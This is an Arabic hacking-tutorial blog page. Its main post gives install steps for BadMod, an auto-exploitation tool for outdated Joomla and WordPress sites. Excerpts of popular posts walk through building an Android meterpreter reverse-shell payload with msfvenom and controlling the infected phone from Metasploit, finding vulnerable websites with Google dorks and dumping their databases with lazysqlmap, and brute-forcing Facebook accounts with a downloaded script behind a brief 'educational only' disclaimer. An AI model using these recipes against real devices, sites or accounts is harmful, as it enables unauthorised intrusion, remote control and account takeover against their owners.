أداة BadMod: أداة استغلال تلقائي للإصدارات القديمة

 Mr. RedRaccoon


BadMod هي أداة استغلال تلقائي تستخدم لاكتشاف واستغلال الثغرات في مواقع الإنترنت مثل Joomla و WordPress، وهي مفيدة في اختبار أمان المواقع. تأتي النسخة 2.0 مع إصلاحات وإضافات جديدة.

الميزات في النسخة 2.0:

  • إصلاح مشكلة الألوان.
  • إصلاح مشكلة الأذونات.
  • إضافة خيار جديد لفحص هدف محدد.
  • إضافة خيار جديد لفحص إضافات Joomla و WordPress.

التثبيت:

لتثبيت الأداة على نظام Linux، اتبع الخطوات التالية:

  1. استنساخ الأداة:

    git clone https://github.com/MrSqar-Ye/BadMod.git $

  2. تثبيت لغة PHP:

    sudo apt-get install php $

  3. تثبيت مكتبة php-curl:

    sudo apt-get install php-curl $

تعليقات

إرسال تعليق

Thankyou.

المشاركات الشائعة من هذه المدونة

كيفية إنشاء Payload ملغم واستخدام Metasploit

صورة
Mr.  RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...
قراءة المزيد

كيفية اختراق موقع ويب باستخدام Termux

صورة
Mr.  RedRaccoon الخطوة الأولى: تحديث النظام وتثبيت الأدوات اللازمة تحديث النظام وتثبيت الأدوات: افتح Termux وأدخل الأوامر التالية: $ apt update && apt upgrade $ pkg install python2 $ pkg install git تثبيت Termux-LazySQLMap: أدخل الأوامر التالية لتثبيت الأداة: $ git clone https://github.com/verluchie/termux-lazysqlmap $ cd termux-lazysqlmap $ chmod 777 install.sh $ ./install.sh الخطوة الثانية: استخدام Google Dorks للعثور على مواقع الويب استخدم Google Dorks للعثور على مواقع الويب الضعيفة التي يمكنك اختبارها. (لمزيد من المعلومات حول Google Dorks، يمكنك البحث عن كيفية استخدامها). الخطوة الثالثة: تنفيذ الاختراق باستخدام Termux-LazySQLMap تشغيل الأداة: بعد تثبيت Termux-LazySQLMap، ابدأ الأداة بكتابة الأمر التالي في Termux: $ lazysqlmap اختيار الموقع المستهدف: أدخل عنوان الموقع الذي تريد اختراقه عندما يُطلب منك ذلك. اختيار خيارات التحقق: اختر الخيار المناسب لك. على سبيل المثال، اختر الخيار الذي يعود بالجداول في قاعدة البيانات. استرجاع الجداول: استخدم الأمر sitedb لاسترجاع الجد...
قراءة المزيد

كيفية اختراق حساب فيسبوك باستخدام Termux

صورة
Mr.  RedRaccoon ملاحظة: يجب أن تكون على علم بأن استخدام الأدوات والبرمجيات لاختراق الحسابات بدون إذن هو غير قانوني وغير أخلاقي. الهدف من هذا الشرح هو توضيح كيفية عمل الأدوات لأغراض تعليمية فقط. يجب عليك دائمًا احترام خصوصية الآخرين والامتثال للقوانين المحلية. إليك خطوات استخدام Termux لاختراق حساب فيسبوك عبر التخمين: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات المطلوبة: apt update && apt upgrade $ $ pkg install git $ pkg install python $ pkg install python2 تثبيت سكربت التخمين: قم بتحميل السكربت من GitHub باستخدام الأوامر التالية: $git clone https://github.com/hackermohamedPro/Aliens-fb $ $ cd Aliens-fb $ pip2 install mechanize إنشاء قائمة كلمات المرور: قم بتشغيل السكربت لإنشاء قائمة كلمات مرور: $python Aliens-list.py عند تشغيل السكربت، سيُطلب منك إدخال اسم لقائمة كلمات المرور، تأكد من استخدام تنسيق .txt مثل passwords.txt . املأ القائمة بكلمات المرور المحتملة، ثم اكتب Pro واضغط على Enter . تشغيل أداة التخمين: ...
قراءة المزيد